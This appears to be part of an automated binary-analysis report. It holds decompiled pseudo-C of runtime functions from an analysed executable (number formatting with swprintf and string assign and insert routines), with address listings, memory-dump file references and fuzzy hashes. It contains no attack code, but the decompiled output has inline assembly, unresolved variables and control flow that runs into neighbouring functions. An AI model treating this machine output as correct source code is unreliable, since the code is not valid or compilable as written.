								_t71 = 0x45 + (_t69 & 0xffffff00 | _t69 != 0x00001000) * 2;
							} else {
								_t71 = 0x41;
							}
							goto L45;
						}
					}
					asm("movapd xmm0, xmm1");
					asm("mulsd xmm0, [0x32bc08]");
					asm("ucomisd xmm0, xmm1");
					asm("lahf");
					_t96 = _t56 & 0x00000044;
					if(_t96 != 0) {
						goto L31;
					}
					asm("movsd xmm4, [0x32bc20]");
					asm("xorps xmm3, xmm3");
					asm("comisd xmm3, xmm1");
					_t65 = _t56 & 0xffffff00 | _t96 > 0x00000000;
					_t97 = _t65;
					if(_t97 != 0) {
						asm("xorpd xmm1, xmm4");
					}
					asm("movsd xmm0, [0x32bc18]");
					asm("comisd xmm1, xmm0");
					asm("movsd xmm2, [0x32bc10]");
					if(_t97 < 0) {
						L18:
						asm("comisd xmm1, xmm3");
						if(_t99 <= 0) {
							L29:
							if(_t65 != 0) {
								asm("xorpd xmm1, xmm4");
							}
							goto L31;
						}
						_t100 = _t76;
						if(_t100 < 0) {
							goto L29;
						}
						if(_t100 > 0) {
							L22:
							asm("movsd xmm0, [0x32bc00]");
							do {
								asm("comisd xmm0, xmm1");
								if(_t101 < 0 || _t67 >= 0x1388) {
									break;
								}
								_t81 = _t81 + 0xfffffff6;
								asm("mulsd xmm1, xmm2");
								asm("adc edi, 0xffffffff");
								_t67 = _t67 + 0xa;
								_t103 = _t76;
							} while (_t103 > 0 || _t103 >= 0 && _t81 >= 0xa);
							_v132 = _t67;
							goto L29;
						}
						_t101 = _t81 - 0xa;
						if(_t101 < 0) {
							goto L29;
						}
						goto L22;
					} else {
						while(_t73 < 0x1388) {
							asm("divsd xmm1, xmm2");
							_t73 = _t73 + 0xa;
							_t99 = _t73;
							asm("comisd xmm1, xmm0");
							if(_t99 >= 0) {
								continue;
							}
							break;
						}
						_v140 = _t73;
						goto L18;
					}
				}
				if(_t89 < 0 || _t80 == 0) {
					if(( *(_t52 + 0x14) & 0x00002000) == 0) {
						_t80 = 6;
						_t76 = 0;
					}
				}
				_t93 = _t76;
				if(_t93 < 0 || _t93 <= 0 && _t80 <= 0x24) {
					_t53 = _t80;
					_v136 = _t80;
					goto L10;
				} else {
					goto L8;
				}
			}


































                                            0x00303cac
                                            0x00303cb1
                                            0x00303cb5
                                            0x00303cb8
                                            0x00303cbb
                                            0x00303cbd
                                            0x00303ce0
                                            0x00303ce0
                                            0x00303ce5
                                            0x00303cf1
                                            0x00303cf1
                                            0x00303cf6
                                            0x00303cf7
                                            0x00303cfc
                                            0x00303cfe
                                            0x00303d00
                                            0x00303d02
                                            0x00303d09
                                            0x00303d0e
                                            0x00303d17
                                            0x00303dd2
                                            0x00303dd2
                                            0x00303dd5
                                            0x00303dd9
                                            0x00303dde
                                            0x00303de4
                                            0x00303de6
                                            0x00303deb
                                            0x00303deb
                                            0x00303df2
                                            0x00303df4
                                            0x00303df7
                                            0x00303df7
                                            0x00303dfa
                                            0x00303dff
                                            0x00303e08
                                            0x00303e36
                                            0x00303e42
                                            0x00303e51
                                            0x00303e44
                                            0x00303e44
                                            0x00303e44
                                            0x00000000
                                            0x00303e42
                                            0x00000000
                                            0x00303e0a
                                            0x00303e10
                                            0x00303e38
                                            0x00303e38
                                            0x00303e58
                                            0x00303e58
                                            0x00303e61
                                            0x00303e66
                                            0x00303e79
                                            0x00303e84
                                            0x00303e9f
                                            0x00303eae
                                            0x00303eae
                                            0x00303e18
                                            0x00303e27
                                            0x00303e1a
                                            0x00303e1a
                                            0x00303e1a
                                            0x00000000
                                            0x00303e18
                                            0x00303e08
                                            0x00303d1d
                                            0x00303d21
                                            0x00303d29
                                            0x00303d2d
                                            0x00303d2e
                                            0x00303d31
                                            0x00000000
                                            0x00000000
                                            0x00303d37
                                            0x00303d3f
                                            0x00303d42
                                            0x00303d46
                                            0x00303d49
                                            0x00303d4b
                                            0x00303d4d
                                            0x00303d4d
                                            0x00303d51
                                            0x00303d59
                                            0x00303d5d
                                            0x00303d65
                                            0x00303d80
                                            0x00303d80
                                            0x00303d84
                                            0x00303dca
                                            0x00303dcc
                                            0x00303dce
                                            0x00303dce
                                            0x00000000
                                            0x00303dcc
                                            0x00303d86
                                            0x00303d88
                                            0x00000000
                                            0x00000000
                                            0x00303d8a
                                            0x00303d91
                                            0x00303d91
                                            0x00303da0
                                            0x00303da0
                                            0x00303da4
                                            0x00000000
                                            0x00000000
                                            0x00303dae
                                            0x00303db1
                                            0x00303db5
                                            0x00303db8
                                            0x00303dbb
                                            0x00303dbb
                                            0x00303dc6
                                            0x00000000
                                            0x00303dc6
                                            0x00303d8c
                                            0x00303d8f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303d67
                                            0x00303d67
                                            0x00303d6f
                                            0x00303d73
                                            0x00303d73
                                            0x00303d76
                                            0x00303d7a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303d7a
                                            0x00303d7c
                                            0x00000000
                                            0x00303d7c
                                            0x00303d65
                                            0x00303cbf
                                            0x00303ccc
                                            0x00303cce
                                            0x00303cd3
                                            0x00303cd3
                                            0x00303ccc
                                            0x00303cd5
                                            0x00303cd7
                                            0x00303ceb
                                            0x00303ced
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: swprintf
                                            • String ID: %$+
                                            • API String ID: 233258989-2626897407
                                            • Opcode ID: fd24ba247fb93d849a902834d0270662d69b5aa6e9517efd8c6a80644ad007c3
                                            • Instruction ID: 54d9c8b634589a50ec086c89230eaeb8ec42e2dac37226e467bfaa2e1462464f
                                            • Opcode Fuzzy Hash: fd24ba247fb93d849a902834d0270662d69b5aa6e9517efd8c6a80644ad007c3
                                            • Instruction Fuzzy Hash: 57516633816B458EDB27CE28C87176B779DAF92390F06871AF855672D1C730CA55C382
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00303EC0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00303EC0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v116;
				intOrPtr _v120;
				char _v126;
				char _v127;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _t51;
				intOrPtr _t52;
				signed int _t55;
				short* _t56;
				int _t60;
				signed int _t64;
				intOrPtr _t66;
				signed int _t68;
				char _t70;
				intOrPtr _t72;
				signed char _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t88;
				intOrPtr _t92;
				void* _t94;
				signed int _t95;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t101;

				_t51 = _a16;
				_v120 = __ecx;
				_t75 =  *((intOrPtr*)(_t51 + 0x1c));
				_t79 =  *((intOrPtr*)(_t51 + 0x18));
				_t88 = _t75;
				if(_t88 > 0) {
					L8:
					_t52 = 0x24;
					_v136 = 0x24;
					L10:
					asm("movsd xmm0, [ebp+0x1c]");
					asm("cdq");
					_t80 = _t79 - _t52;
					asm("sbb edi, edx");
					_t72 = 0;
					_t66 = 0;
					_v140 = 0;
					_t55 =  *(_a16 + 0x14) & 0x00003000;
					_v132 = 0;
					_t94 = _t55 - 0x2000;
					if(_t94 != 0) {
						L31:
						_t76 = _a16;
						_t56 =  &_v127;
						_v128 = 0x25;
						_t73 =  *(_a16 + 0x14);
						if((_t73 & 0x00000020) != 0) {
							_v127 = 0x2b;
							_t56 =  &_v126;
						}
						if((_t73 & 0x00000010) != 0) {
							 *_t56 = 0x23;
							_t56 = _t56 + 1;
						}
						 *_t56 = 0x2a2e;
						_t68 = _t73 & 0x00003000;
						 *((char*)(_t56 + 2)) = 0x4c;
						if((_t73 & 0x00000004) == 0) {
							if(_t68 != 0x2000) {
								if(_t68 != 0x3000) {
									_t70 = 0x65 + (_t68 & 0xffffff00 | _t68 != 0x00001000) * 2;
								} else {
									_t70 = 0x61;
								}
								goto L45;
							}
							goto L41;
						} else {
							if(_t68 == 0x2000) {
								L41:
								_t70 = 0x66;
								L45:
								 *((char*)(_t56 + 3)) = _t70;
								asm("movsd [esp], xmm0");
								 *((char*)(_t56 + 4)) = 0;
								_t60 = swprintf( &_v116, 0x6c,  &_v128, _v136);
								_t81 = _a4;
								E003055B0(_v120, _t81, _a8, _a12, _t76, _a20,  &_v116, _v140, _v132, _t80, _t60);
								return _t81;
							}
							if(_t68 != 0x3000) {
								_t70 = 0x45 + (_t68 & 0xffffff00 | _t68 != 0x00001000) * 2;
							} else {
								_t70 = 0x41;
							}
							goto L45;
						}
					}
					asm("movsd xmm4, [0x32bc20]");
					asm("xorps xmm3, xmm3");
					asm("comisd xmm3, xmm0");
					_t64 = _t55 & 0xffffff00 | _t94 > 0x00000000;
					_t95 = _t64;
					if(_t95 != 0) {
						asm("xorpd xmm0, xmm4");
					}
					asm("movsd xmm1, [0x32bc18]");
					asm("comisd xmm0, xmm1");
					asm("movsd xmm2, [0x32bc10]");
					if(_t95 < 0) {
						L18:
						asm("comisd xmm0, xmm3");
						if(_t97 <= 0) {
							L29:
							if(_t64 != 0) {
								asm("xorpd xmm0, xmm4");
							}
							goto L31;
						}
						_t98 = _t75;
						if(_t98 < 0) {
							goto L29;
						}
						if(_t98 > 0) {
							L22:
							asm("movsd xmm1, [0x32bc00]");
							do {
								asm("comisd xmm1, xmm0");
								if(_t99 < 0 || _t66 >= 0x1388) {
									break;
								}
								_t80 = _t80 + 0xfffffff6;
								asm("mulsd xmm0, xmm2");
								asm("adc edi, 0xffffffff");
								_t66 = _t66 + 0xa;
								_t101 = _t75;
							} while (_t101 > 0 || _t101 >= 0 && _t80 >= 0xa);
							_v132 = _t66;
							goto L29;
						}
						_t99 = _t80 - 0xa;
						if(_t99 < 0) {
							goto L29;
						}
						goto L22;
					} else {
						while(_t72 < 0x1388) {
							asm("divsd xmm0, xmm2");
							_t72 = _t72 + 0xa;
							_t97 = _t72;
							asm("comisd xmm0, xmm1");
							if(_t97 >= 0) {
								continue;
							}
							break;
						}
						_v140 = _t72;
						goto L18;
					}
				}
				if(_t88 < 0 || _t79 == 0) {
					if(( *(_t51 + 0x14) & 0x00002000) == 0) {
						_t79 = 6;
						_t75 = 0;
					}
				}
				_t92 = _t75;
				if(_t92 < 0 || _t92 <= 0 && _t79 <= 0x24) {
					_t52 = _t79;
					_v136 = _t79;
					goto L10;
				} else {
					goto L8;
				}
			}


































                                            0x00303ecc
                                            0x00303ed1
                                            0x00303ed5
                                            0x00303ed8
                                            0x00303edb
                                            0x00303edd
                                            0x00303f00
                                            0x00303f00
                                            0x00303f05
                                            0x00303f11
                                            0x00303f11
                                            0x00303f16
                                            0x00303f17
                                            0x00303f1c
                                            0x00303f1e
                                            0x00303f20
                                            0x00303f22
                                            0x00303f29
                                            0x00303f2e
                                            0x00303f32
                                            0x00303f37
                                            0x00303fd4
                                            0x00303fd4
                                            0x00303fd7
                                            0x00303fdb
                                            0x00303fe0
                                            0x00303fe6
                                            0x00303fe8
                                            0x00303fed
                                            0x00303fed
                                            0x00303ff4
                                            0x00303ff6
                                            0x00303ff9
                                            0x00303ff9
                                            0x00303ffc
                                            0x00304001
                                            0x00304007
                                            0x0030400e
                                            0x0030403c
                                            0x00304048
                                            0x00304057
                                            0x0030404a
                                            0x0030404a
                                            0x0030404a
                                            0x00000000
                                            0x00304048
                                            0x00000000
                                            0x00304010
                                            0x00304016
                                            0x0030403e
                                            0x0030403e
                                            0x0030405e
                                            0x0030405e
                                            0x00304067
                                            0x0030406c
                                            0x0030407f
                                            0x0030408a
                                            0x003040a5
                                            0x003040b4
                                            0x003040b4
                                            0x0030401e
                                            0x0030402d
                                            0x00304020
                                            0x00304020
                                            0x00304020
                                            0x00000000
                                            0x0030401e
                                            0x0030400e
                                            0x00303f3d
                                            0x00303f45
                                            0x00303f48
                                            0x00303f4c
                                            0x00303f4f
                                            0x00303f51
                                            0x00303f53
                                            0x00303f53
                                            0x00303f57
                                            0x00303f5f
                                            0x00303f63
                                            0x00303f6b
                                            0x00303f89
                                            0x00303f89
                                            0x00303f8d
                                            0x00303fcc
                                            0x00303fce
                                            0x00303fd0
                                            0x00303fd0
                                            0x00000000
                                            0x00303fce
                                            0x00303f8f
                                            0x00303f91
                                            0x00000000
                                            0x00000000
                                            0x00303f93
                                            0x00303f9a
                                            0x00303f9a
                                            0x00303fa2
                                            0x00303fa2
                                            0x00303fa6
                                            0x00000000
                                            0x00000000
                                            0x00303fb0
                                            0x00303fb3
                                            0x00303fb7
                                            0x00303fba
                                            0x00303fbd
                                            0x00303fbd
                                            0x00303fc8
                                            0x00000000
                                            0x00303fc8
                                            0x00303f95
                                            0x00303f98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303f70
                                            0x00303f70
                                            0x00303f78
                                            0x00303f7c
                                            0x00303f7c
                                            0x00303f7f
                                            0x00303f83
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303f83
                                            0x00303f85
                                            0x00000000
                                            0x00303f85
                                            0x00303f6b
                                            0x00303edf
                                            0x00303eec
                                            0x00303eee
                                            0x00303ef3
                                            0x00303ef3
                                            0x00303eec
                                            0x00303ef5
                                            0x00303ef7
                                            0x00303f0b
                                            0x00303f0d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: swprintf
                                            • String ID: %$+
                                            • API String ID: 233258989-2626897407
                                            • Opcode ID: 8122beacd0709458c22584fd7e87c127ea50acbb84095a860cd7d35d92fb284d
                                            • Instruction ID: 8176c121adc314e8f6935102325d2c417ceb9cfbeb94cf73e7bac41566e1730e
                                            • Opcode Fuzzy Hash: 8122beacd0709458c22584fd7e87c127ea50acbb84095a860cd7d35d92fb284d
                                            • Instruction Fuzzy Hash: 215158728167068FDB27CF28C86075BBBADEF92390F158219F9556B2E1D730CA45C782
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00302C70, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 55%
                                            			E00302C70(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr* _a8, void _a12) {
				intOrPtr _v20;
				char _v24;
				void* __ebp;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t44;
				intOrPtr* _t50;
				intOrPtr _t51;
				intOrPtr* _t60;
				intOrPtr* _t64;
				char _t68;
				intOrPtr _t69;
				intOrPtr* _t80;
				void* _t90;

				_t50 = _a4;
				_t79 = __ecx;
				_t60 = _a8;
				_t68 =  *((intOrPtr*)(_t50 + 0x10));
				if(_t68 < _t60) {
					E0030999B(__eflags, "invalid string position");
					goto L25;
				} else {
					_t68 =  <  ? _a12 : _t68 - _t60;
					if(__ecx != _t50) {
						__eflags = _t68 - 0xfffffffe;
						if(__eflags > 0) {
							goto L26;
						} else {
							_t33 =  *((intOrPtr*)(__ecx + 0x14));
							__eflags = _t33 - _t68;
							if(_t33 >= _t68) {
								__eflags = _t68;
								if(_t68 != 0) {
									goto L9;
								} else {
									 *((intOrPtr*)(__ecx + 0x10)) = _t68;
									__eflags = _t33 - 0x10;
									if(_t33 < 0x10) {
										 *((char*)(__ecx)) = 0;
										return __ecx;
									} else {
										 *((char*)( *__ecx)) = 0;
										return __ecx;
									}
								}
							} else {
								E00306290(__ecx, _t68,  *((intOrPtr*)(__ecx + 0x10)));
								_t60 = _a8;
								__eflags = _t68;
								if(_t68 == 0) {
									L23:
									return _t79;
								} else {
									L9:
									__eflags =  *((intOrPtr*)(_t50 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t50 + 0x14)) >= 0x10) {
										_t50 =  *_t50;
									}
									__eflags =  *((intOrPtr*)(_t79 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t79 + 0x14)) < 0x10) {
										_t64 = _t79;
									} else {
										_t64 =  *_t79;
									}
									__eflags = _t68;
									if(_t68 != 0) {
										E0030EE10(_t64, _t50 + _t60, _t68);
									}
									__eflags =  *((intOrPtr*)(_t79 + 0x14)) - 0x10;
									 *((intOrPtr*)(_t79 + 0x10)) = _t68;
									if( *((intOrPtr*)(_t79 + 0x14)) < 0x10) {
										 *((char*)(_t79 + _t68)) = 0;
										goto L23;
									} else {
										 *((char*)( *_t79 + _t68)) = 0;
										return _t79;
									}
								}
							}
						}
					} else {
						_t44 = _t68 + _t60;
						if( *((intOrPtr*)(__ecx + 0x10)) < _t44) {
							L25:
							E0030999B(__eflags, "invalid string position");
							L26:
							_push("string too long");
							_t31 = E0030996D(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							__eflags = _v24;
							_push(_t79);
							_push(_t68);
							_t69 = _v20;
							_t80 = _t60;
							if(_v24 != 0) {
								__eflags =  *((intOrPtr*)(_t80 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t80 + 0x14)) >= 0x10) {
									_push(_t50);
									_t51 =  *_t80;
									__eflags = _t69;
									if(_t69 != 0) {
										E0030EE10(_t80, _t51, _t69);
										_t90 = _t90 + 0xc;
									}
									_t31 = L0030DF6A(_t51);
								}
							}
							 *((intOrPtr*)(_t80 + 0x10)) = _t69;
							 *((intOrPtr*)(_t80 + 0x14)) = 0xf;
							 *((char*)(_t69 + _t80)) = 0;
							return _t31;
						} else {
							 *((intOrPtr*)(__ecx + 0x10)) = _t44;
							if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
								_push(_t60);
								 *((char*)(__ecx + _t44)) = 0;
								E00304340(__ecx, 0);
								return __ecx;
							} else {
								_push(_t60);
								 *((char*)( *__ecx + _t44)) = 0;
								E00304340(__ecx, 0);
								return __ecx;
							}
						}
					}
				}
			}

















                                            0x00302c74
                                            0x00302c79
                                            0x00302c7b
                                            0x00302c7e
                                            0x00302c83
                                            0x00302d77
                                            0x00000000
                                            0x00302c89
                                            0x00302c8e
                                            0x00302c94
                                            0x00302cdd
                                            0x00302ce0
                                            0x00000000
                                            0x00302ce6
                                            0x00302ce6
                                            0x00302ce9
                                            0x00302ceb
                                            0x00302d11
                                            0x00302d13
                                            0x00000000
                                            0x00302d15
                                            0x00302d15
                                            0x00302d18
                                            0x00302d1b
                                            0x00302d30
                                            0x00302d34
                                            0x00302d1d
                                            0x00302d20
                                            0x00302d28
                                            0x00302d28
                                            0x00302d1b
                                            0x00302ced
                                            0x00302cf3
                                            0x00302cf8
                                            0x00302cfb
                                            0x00302cfd
                                            0x00302d69
                                            0x00302d6f
                                            0x00302cff
                                            0x00302cff
                                            0x00302cff
                                            0x00302d03
                                            0x00302d05
                                            0x00302d05
                                            0x00302d07
                                            0x00302d0b
                                            0x00302d37
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d39
                                            0x00302d3b
                                            0x00302d43
                                            0x00302d48
                                            0x00302d4b
                                            0x00302d4f
                                            0x00302d52
                                            0x00302d65
                                            0x00000000
                                            0x00302d54
                                            0x00302d56
                                            0x00302d60
                                            0x00302d60
                                            0x00302d52
                                            0x00302cfd
                                            0x00302ceb
                                            0x00302c96
                                            0x00302c96
                                            0x00302c9c
                                            0x00302d7c
                                            0x00302d81
                                            0x00302d86
                                            0x00302d86
                                            0x00302d8b
                                            0x00302d90
                                            0x00302d91
                                            0x00302d92
                                            0x00302d93
                                            0x00302d94
                                            0x00302d95
                                            0x00302d96
                                            0x00302d97
                                            0x00302d98
                                            0x00302d99
                                            0x00302d9a
                                            0x00302d9b
                                            0x00302d9c
                                            0x00302d9d
                                            0x00302d9e
                                            0x00302d9f
                                            0x00302da3
                                            0x00302da7
                                            0x00302da8
                                            0x00302da9
                                            0x00302dac
                                            0x00302dae
                                            0x00302db0
                                            0x00302db4
                                            0x00302db6
                                            0x00302db7
                                            0x00302db9
                                            0x00302dbb
                                            0x00302dc0
                                            0x00302dc5
                                            0x00302dc5
                                            0x00302dc9
                                            0x00302dd1
                                            0x00302db4
                                            0x00302dd2
                                            0x00302dd5
                                            0x00302ddc
                                            0x00302de3
                                            0x00302ca2
                                            0x00302ca6
                                            0x00302ca9
                                            0x00302cc6
                                            0x00302ccb
                                            0x00302ccf
                                            0x00302cda
                                            0x00302cab
                                            0x00302cad
                                            0x00302cb2
                                            0x00302cb6
                                            0x00302cc1
                                            0x00302cc1
                                            0x00302ca9
                                            0x00302c9c
                                            0x00302c94

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 4104443479-4289949731
                                            • Opcode ID: 14a0fee5a12cf496db0a92b6260b030ed0e6614143fd3345c173ce5d18696b64
                                            • Instruction ID: 77d0be92cb119aaa7866b3dbc86486f535022221655b0d878f6d03e493a2047d
                                            • Opcode Fuzzy Hash: 14a0fee5a12cf496db0a92b6260b030ed0e6614143fd3345c173ce5d18696b64
                                            • Instruction Fuzzy Hash: 4531B2323023108BD7269E5CF8A4B5BF7A9EB90B21F100A2FE5558B6C5C7B19C4087A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00306180, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 69%
                                            			E00306180(signed int __eax, intOrPtr* __ecx, unsigned int _a4, unsigned int _a8, intOrPtr _a12) {
				char _v12;
				signed int _v20;
				void* _v25;
				intOrPtr* _v32;
				intOrPtr _v44;
				intOrPtr* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t47;
				intOrPtr* _t52;
				intOrPtr _t60;
				intOrPtr _t61;
				unsigned int _t76;
				unsigned int _t77;
				intOrPtr* _t79;
				unsigned int _t81;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr _t91;
				signed int _t93;
				intOrPtr* _t100;
				signed int _t103;
				intOrPtr _t104;

				_t89 = _a4;
				_t99 = __ecx;
				_t79 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t79 < _t89) {
					E0030999B(__eflags, "invalid string position");
					goto L24;
				} else {
					_t76 = _a8;
					if((__eax | 0xffffffff) - _t79 <= _t76) {
						L24:
						_push("string too long");
						E0030996D(__eflags);
						goto L25;
					} else {
						if(_t76 == 0) {
							L22:
							return _t99;
						} else {
							_push(_t91);
							_t91 = _t79 + _t76;
							if(_t91 > 0xfffffffe) {
								L25:
								_push("string too long");
								E0030996D(__eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(0xffffffff);
								_push(E00324690);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t103;
								_t104 = _t103 - 0x14;
								_push(_t76);
								_push(_t99);
								_push(_t91);
								_v44 = _t104;
								_t100 = _t79;
								_v56 = _t100;
								_t47 = _v20;
								_t93 = _t47 | 0x0000000f;
								__eflags = _t93 - 0xfffffffe;
								if(_t93 <= 0xfffffffe) {
									_t76 =  *(_t100 + 0x14);
									_t81 = _t76 >> 1;
									_t89 = 0xaaaaaaab * _t93 >> 0x20 >> 1;
									__eflags = _t81 - 0xaaaaaaab * _t93 >> 0x20 >> 1;
									if(_t81 > 0xaaaaaaab * _t93 >> 0x20 >> 1) {
										__eflags = _t76 - 0xfffffffe - _t81;
										_t93 = _t81 + _t76;
										if(_t76 > 0xfffffffe - _t81) {
											_t93 = 0xfffffffe;
										}
									}
								} else {
									_t93 = _t47;
								}
								_v12 = 0;
								_t30 = _t93 + 1; // 0xffffffff
								_v32 = E00307200(_t76, _t89, _t93, _t100, _t30);
								_v12 = 0xffffffff;
								_t77 = _a4;
								__eflags = _t77;
								if(_t77 != 0) {
									__eflags =  *(_t100 + 0x14) - 0x10;
									if( *(_t100 + 0x14) < 0x10) {
										_t84 = _t100;
									} else {
										_t84 =  *_t100;
									}
									__eflags = _t77;
									if(_t77 != 0) {
										E0030EE10(_t51, _t84, _t77);
										_t104 = _t104 + 0xc;
									}
								}
								__eflags =  *(_t100 + 0x14) - 0x10;
								if( *(_t100 + 0x14) >= 0x10) {
									L0030DF6A( *_t100);
								}
								 *_t100 = 0;
								_t52 = _v32;
								 *_t100 = _t52;
								 *(_t100 + 0x14) = _t93;
								 *((intOrPtr*)(_t100 + 0x10)) = _t77;
								__eflags = _t93 - 0x10;
								if(_t93 >= 0x10) {
									_t100 = _t52;
								}
								 *((char*)(_t100 + _t77)) = 0;
								 *[fs:0x0] = _v20;
								return _t52;
							} else {
								_t60 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t60 >= _t91) {
									__eflags = _t91;
									if(_t91 != 0) {
										goto L6;
									} else {
										 *((intOrPtr*)(__ecx + 0x10)) = _t91;
										__eflags = _t60 - 0x10;
										if(_t60 < 0x10) {
											 *((char*)(__ecx)) = 0;
											return __ecx;
										} else {
											 *((char*)( *__ecx)) = 0;
											return __ecx;
										}
									}
								} else {
									_push(_t79);
									_push(_t91);
									L26();
									_t89 = _a4;
									if(_t91 == 0) {
										L21:
										goto L22;
									} else {
										L6:
										_t61 =  *((intOrPtr*)(_t99 + 0x14));
										if(_t61 < 0x10) {
											_a8 = _t99;
										} else {
											_a8 =  *_t99;
										}
										if(_t61 < 0x10) {
											_t85 = _t99;
										} else {
											_t85 =  *_t99;
										}
										_t63 =  *((intOrPtr*)(_t99 + 0x10)) != _t89;
										if( *((intOrPtr*)(_t99 + 0x10)) != _t89) {
											E0030D480(_t85 + _t89 + _t76, _a8 + _t89, _t63);
											_t89 = _a4;
										}
										E003071B0(_t99, _t89, _t76, _a12);
										 *((intOrPtr*)(_t99 + 0x10)) = _t91;
										if( *((intOrPtr*)(_t99 + 0x14)) < 0x10) {
											 *((char*)(_t99 + _t91)) = 0;
											goto L21;
										} else {
											 *((char*)( *_t99 + _t91)) = 0;
											return _t99;
										}
									}
								}
							}
						}
					}
				}
			}




























                                            0x00306183
                                            0x00306188
                                            0x0030618a
                                            0x0030618f
                                            0x0030626f
                                            0x00000000
                                            0x00306195
                                            0x00306195
                                            0x0030619f
                                            0x00306274
                                            0x00306274
                                            0x00306279
                                            0x00000000
                                            0x003061a5
                                            0x003061a7
                                            0x00306262
                                            0x00306267
                                            0x003061ad
                                            0x003061ad
                                            0x003061ae
                                            0x003061b4
                                            0x0030627e
                                            0x0030627e
                                            0x00306283
                                            0x00306288
                                            0x00306289
                                            0x0030628a
                                            0x0030628b
                                            0x0030628c
                                            0x0030628d
                                            0x0030628e
                                            0x0030628f
                                            0x00306293
                                            0x00306295
                                            0x003062a0
                                            0x003062a1
                                            0x003062a8
                                            0x003062ab
                                            0x003062ac
                                            0x003062ad
                                            0x003062ae
                                            0x003062b1
                                            0x003062b3
                                            0x003062b6
                                            0x003062bb
                                            0x003062be
                                            0x003062c1
                                            0x003062c7
                                            0x003062cc
                                            0x003062d5
                                            0x003062d7
                                            0x003062d9
                                            0x003062e2
                                            0x003062e4
                                            0x003062e7
                                            0x003062e9
                                            0x003062e9
                                            0x003062e7
                                            0x003062c3
                                            0x003062c3
                                            0x003062c3
                                            0x003062ee
                                            0x003062f5
                                            0x00306301
                                            0x00306304
                                            0x00306344
                                            0x00306347
                                            0x00306349
                                            0x0030634b
                                            0x0030634f
                                            0x00306355
                                            0x00306351
                                            0x00306351
                                            0x00306351
                                            0x00306357
                                            0x00306359
                                            0x0030635e
                                            0x00306363
                                            0x00306363
                                            0x00306359
                                            0x00306366
                                            0x0030636a
                                            0x0030636e
                                            0x00306373
                                            0x00306376
                                            0x00306379
                                            0x0030637c
                                            0x0030637e
                                            0x00306381
                                            0x00306384
                                            0x00306387
                                            0x00306389
                                            0x00306389
                                            0x0030638b
                                            0x00306392
                                            0x0030639f
                                            0x003061ba
                                            0x003061ba
                                            0x003061bf
                                            0x003061e4
                                            0x003061e6
                                            0x00000000
                                            0x003061e8
                                            0x003061e8
                                            0x003061eb
                                            0x003061ee
                                            0x00306203
                                            0x00306207
                                            0x003061f0
                                            0x003061f3
                                            0x003061fb
                                            0x003061fb
                                            0x003061ee
